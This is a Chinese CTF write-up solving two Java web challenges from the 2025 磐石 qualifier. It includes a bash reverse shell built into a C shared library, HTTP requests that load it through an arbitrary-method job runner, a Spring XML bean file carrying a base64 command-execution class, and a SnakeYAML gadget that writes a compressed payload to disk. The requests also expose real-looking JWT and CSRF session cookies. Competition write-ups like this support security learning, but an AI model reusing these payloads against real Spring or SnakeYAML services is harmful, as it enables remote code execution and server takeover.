2025磐石初赛Web两道Java
p0l1st included in CTF
Contents
web-java_ez
VulnController
public class VulnController {
private static Map<String, ScheduledJob> jobs = new HashMap();
private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};
@GetMapping({"/server"})
public Map<String, Object> getServerInfo() {
Map<String, Object> info = new HashMap<>();
info.put("javaHome", System.getProperty("java.home"));
info.put("javaVersion", System.getProperty("java.version"));
info.put("osName", System.getProperty("os.name"));
info.put("userDir", System.getProperty("user.dir"));
info.put("uploadDir", "/tmp/upload");
Charset gbk = Charset.forName("GBK");
byte[] bytes = gbk.encode("你好").array();
System.out.println(Arrays.toString(bytes));
return info;
}
@PostMapping({"/upload"})
public Map<String, String> uploadFile(@RequestParam("file") MultipartFile file) {
String originalFilename;
Map<String, String> result = new HashMap<>();
try {
File dir = new File("/tmp/upload");
if (!dir.exists()) {
dir.mkdirs();
}
originalFilename = file.getOriginalFilename();
} catch (Exception e) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", e.getMessage());
}
if (originalFilename == null) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "文件名为空");
return result;
}
String filename = new File(originalFilename).getName();
if (filename.contains(CallerDataConverter.DEFAULT_RANGE_DELIMITER) || filename.contains("/") || filename.contains("\\") || filename.startsWith(".")) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "非法文件名");
return result;
}
File dest = new File("/tmp/upload" + filename);
String uploadPathCanonical = new File("/tmp/upload").getCanonicalPath();
String destCanonical = dest.getCanonicalPath();
if (!destCanonical.startsWith(uploadPathCanonical + File.separator)) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "非法文件路径");
return result;
}
file.transferTo(dest);
result.put(BindTag.STATUS_VARIABLE_NAME, "success");
result.put("path", dest.getAbsolutePath());
result.put("message", "文件上传成功");
return result;
}
@PostMapping({"/job/add"})
public Map<String, Object> addJob(@RequestBody ScheduledJob job) {
Map<String, Object> result = new HashMap<>();
if (containsBlacklist(job.getInvokeTarget())) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "包含非法字符");
return result;
}
if (!containsWhitelist(job.getInvokeTarget())) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "目标不在白名单中");
return result;
}
jobs.put(job.getJobName(), job);
result.put(BindTag.STATUS_VARIABLE_NAME, "success");
result.put("message", "任务添加成功");
result.put("jobId", job.getJobName());
return result;
}
@PostMapping({"/job/run/{jobName}"})
public Map<String, Object> runJob(@PathVariable String jobName) {
Map<String, Object> result = new HashMap<>();
ScheduledJob job = jobs.get(jobName);
if (job == null) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", "任务不存在");
return result;
}
try {
invokeMethod(job.getInvokeTarget());
result.put(BindTag.STATUS_VARIABLE_NAME, "success");
result.put("message", "任务执行成功");
} catch (Exception e) {
result.put(BindTag.STATUS_VARIABLE_NAME, "error");
result.put("message", e.getMessage());
result.put("stackTrace", e.getStackTrace()[0].toString());
}
return result;
}
private boolean containsBlacklist(String str) {
if (str == null) {
return false;
}
String lowerStr = str.toLowerCase();
for (String blackItem : JOB_BLACKLIST) {
if (lowerStr.contains(blackItem.toLowerCase())) {
return true;
}
}
return false;
}
private boolean containsWhitelist(String str) {
if (str == null) {
return false;
}
for (String whiteItem : JOB_WHITELIST) {
if (str.contains(whiteItem)) {
return true;
}
}
return false;
}
private Object invokeMethod(String invokeTarget) throws Exception {
int hashIndex = invokeTarget.indexOf(35);
if (hashIndex == -1) {
throw new IllegalArgumentException("Invalid format, expected: className#methodName(params)");
}
String className = invokeTarget.substring(0, hashIndex);
String methodAndParams = invokeTarget.substring(hashIndex + 1);
int paramStart = methodAndParams.indexOf(40);
int paramEnd = methodAndParams.lastIndexOf(41);
if (paramStart != -1 && paramEnd != -1) {
String methodName = methodAndParams.substring(0, paramStart);
String paramStr = methodAndParams.substring(paramStart + 1, paramEnd);
Class<?> clazz = Class.forName(className);
List<Object> paramValues = new ArrayList<>();
List<Class<?>> paramTypes = new ArrayList<>();
if (!paramStr.trim().isEmpty()) {
String[] params = splitParams(paramStr);
for (String str : params) {
String param = str.trim();
if (param.startsWith("'") && param.endsWith("'")) {
String value = param.substring(1, param.length() - 1);
paramValues.add(value);
paramTypes.add(String.class);
} else if (param.equals(BeanDefinitionParserDelegate.NULL_ELEMENT)) {
paramValues.add(null);
paramTypes.add(String.class);
} else if (param.matches("\\d+")) {
paramValues.add(Integer.valueOf(Integer.parseInt(param)));
paramTypes.add(Integer.TYPE);
} else if (!param.equals("true") && !param.equals("false")) {
paramValues.add(param);
paramTypes.add(String.class);
} else {
paramValues.add(Boolean.valueOf(Boolean.parseBoolean(param)));
paramTypes.add(Boolean.TYPE);
}
}
}
try {
Method method = clazz.getMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
if (Modifier.isStatic(method.getModifiers())) {
return method.invoke(null, paramValues.toArray());
}
Object instance = clazz.newInstance();
return method.invoke(instance, paramValues.toArray());
} catch (NoSuchMethodException e) {
Method method2 = clazz.getDeclaredMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
method2.setAccessible(true);
if (Modifier.isStatic(method2.getModifiers())) {
return method2.invoke(null, paramValues.toArray());
}
Object instance2 = clazz.newInstance();
return method2.invoke(instance2, paramValues.toArray());
}
}
throw new IllegalArgumentException("Invalid method format");
}
private String[] splitParams(String paramStr) {
List<String> params = new ArrayList<>();
int bracketLevel = 0;
int start = 0;
for (int i = 0; i < paramStr.length(); i++) {
char c = paramStr.charAt(i);
if (c != '(' && c != '{' && c != '[') {
if (c == ')' || c == '}' || c == ']') {
bracketLevel--;
} else if (c == ',' && bracketLevel == 0) {
params.add(paramStr.substring(start, i));
start = i + 1;
}
} else {
bracketLevel++;
}
}
if (start < paramStr.length()) {
params.add(paramStr.substring(start));
}
return (String[]) params.toArray(new String[0]);
}
/* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/VulnController$ScheduledJob.class */
static class ScheduledJob {
private String jobName;
private String invokeTarget;
private String cronExpression;
ScheduledJob() {
}
public String getJobName() {
return this.jobName;
}
public void setJobName(String jobName) {
this.jobName = jobName;
}
public String getInvokeTarget() {
return this.invokeTarget;
}
public void setInvokeTarget(String invokeTarget) {
this.invokeTarget = invokeTarget;
}
public String getCronExpression() {
return this.cronExpression;
}
public void setCronExpression(String cronExpression) {
this.cronExpression = cronExpression;
}
}
}可以上传任意文件到/tmp/upload,可以写任务并且执行任务时可以调用任意方法
注意这里的白名单和黑名单
private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};看起来限制的很死,但是我们可以参考若依4.8计划任务RCE
编译上传so文件
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__ ((constructor)) void angel(void) {
system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
}写任务时加载
POST /api/job/add HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json
{
"jobName" : "aa3",
"invokeTarget" : "java.lang.System#load('/tmp/uploads/com.jabaez.FLAG.so')"
}执行任务
POST /api/job/run/aa3 HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json反弹shell
ezyaml
SnakeYaml反序列化
这里的黑名单加上不出网限制了打不了JNDI,同时也无法加载远程类
参考java反序列化之SnakeYaml,可以写jar包,但问题是无法加载,所以这题当时就没出
第二天突然看到从 SnakeYaml 看 ClassPathXmlApplicationContext 不出网利用,想起来P牛之前写过的一篇文章ClassPathXmlApplicationContext的不出网利用
既然我们已经可以写入任意文件了,那么也就可以通过加载XML去执行命令,题目过滤了ClassPath自然也就用不了ClassPathXmlApplicationContext,但是还可以利用FileSystemXmlApplicationContext
我们就可以构造出payload,首先写一个xml,这个xml可以用javachains写一个回显马
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
<property name="arguments">
<list>
<value>yv66vgAAADIBOwEAZm9yZy9hcGFjaGUvY29tbW9tcy9iZWFudXRpbHMvY295b3RlL2Rlc2VyaWFsaXphdGlvbi9WYWx1ZUluc3RhbnRpYXRvcnNkM2Y5MzlmMjA1ZjM0Mzk0ODA3M2UwMmQwMzlkNzhkYQcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAAY8aW5pdD4BAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAHDAAFAAYKAAQACQEAA3J1bgwACwAGCgACAAwBABBnZXRSZXFIZWFkZXJOYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAANjbWQIABABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HABIBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwAUAQAQamF2YS9sYW5nL1RocmVhZAcAFgEACmdldFRocmVhZHMIABgBAA9qYXZhL2xhbmcvQ2xhc3MHABoBABJbTGphdmEvbGFuZy9DbGFzczsHABwBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAB4AHwoAGwAgAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAiAQANc2V0QWNjZXNzaWJsZQEABChaKVYMACQAJQoAIwAmAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAAoACkKACMAKgEAE1tMamF2YS9sYW5nL1RocmVhZDsHACwBAAdnZXROYW1lDAAuAA8KABcALwEABGh0dHAIADEBABBqYXZhL2xhbmcvU3RyaW5nBwAzAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMADUANgoANAA3AQAIQWNjZXB0b3IIADkBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMADsAPAoABAA9AQAGdGFyZ2V0CAA/AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAQQBCCgAbAEMBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcARQoARgAmAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAEgASQoARgBKAQAIZW5kcG9pbnQIAEwBAAZ0aGlzJDAIAE4BAAdoYW5kbGVyCABQAQANZ2V0U3VwZXJjbGFzcwwAUgA8CgAbAFMBAAZnbG9iYWwIAFUBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAFcAWAoAGwBZAQAib3JnLmFwYWNoZS5jb3lvdGUuUmVxdWVzdEdyb3VwSW5mbwgAWwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAXQEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAF8AYAoAXgBhCgAbAC8BAApwcm9jZXNzb3JzCABkAQATamF2YS91dGlsL0FycmF5TGlzdAcAZgEABHNpemUBAAMoKUkMAGgAaQoAZwBqAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABIAGwKAGcAbQEAA3JlcQgAbwEAB2dldE5vdGUIAHEBABFqYXZhL2xhbmcvSW50ZWdlcgcAcwEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAdQB2CQB0AHcBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAeQB6CgB0AHsBAAlnZXRIZWFkZXIIAH0BAAlnZXRNZXRob2QMAH8AHwoAGwCADAAOAA8KAAIAggEAC2dldFJlc3BvbnNlCACEAQAJZ2V0V3JpdGVyCACGAQAOamF2YS9pby9Xcml0ZXIHAIgBAAZoYW5kbGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwAigCLCgACAIwBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAjgCPCgCJAJABAAVmbHVzaAwAkgAGCgCJAJMBAAVjbG9zZQwAlQAGCgCJAJYBAARleGVjAQAHb3MubmFtZQgAmQEAEGphdmEvbGFuZy9TeXN0ZW0HAJsBAAtnZXRQcm9wZXJ0eQwAnQCLCgCcAJ4BAAt0b0xvd2VyQ2FzZQwAoAAPCgA0AKEBAAN3aW4IAKMBAAcvYmluL3NoCAClAQACLWMIAKcBAAdjbWQuZXhlCACpAQACL2MIAKsBABFqYXZhL2xhbmcvUnVudGltZQcArQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAK8AsAoArgCxAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAmACzCgCuALQBABFqYXZhL2xhbmcvUHJvY2VzcwcAtgEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsMALgAuQoAtwC6AQARamF2YS91dGlsL1NjYW5uZXIHALwBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMAAUAvgoAvQC/AQACXGEIAMEBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMAMMAxAoAvQDFAQAACADHAQAHaGFzTmV4dAEAAygpWgwAyQDKCgC9AMsBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgcAzQoAzgAJAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7DADQANEKAM4A0gEABG5leHQMANQADwoAvQDVAQAIdG9TdHJpbmcMANcADwoAzgDYAQAKZ2V0TWVzc2FnZQwA2gAPCgAIANsBABNbTGphdmEvbGFuZy9TdHJpbmc7BwDdAQATamF2YS9pby9JbnB1dFN0cmVhbQcA3wEABmV5SmVYQQgA4QEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoMAOMA5AoANADlAQAGbGVuZ3RoDADnAGkKADQA6AEABmNoYXJBdAEABChJKUMMAOoA6woANADsAQAVKEMpTGphdmEvbGFuZy9TdHJpbmc7DAB5AO4KADQA7wEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJDADxAPIKAHQA8wEAAS4IAPUBAAdpbmRleE9mDAD3APIKADQA+AEACXN1YnN0cmluZwEAFihJSSlMamF2YS9sYW5nL1N0cmluZzsM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</value>
</list>
</property>
</bean>
<bean id="classLoader" class="javax.management.loading.MLet"/>
<bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
<constructor-arg ref="decoder"/>
<constructor-arg type="int" value="0"/>
<constructor-arg type="int" value="5129"/>
</bean>
<bean factory-bean="clazz" factory-method="newInstance"/>
</beans>!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File ["./poc.xml"],false],!!java.util.zip.Inflater { input: !!binary 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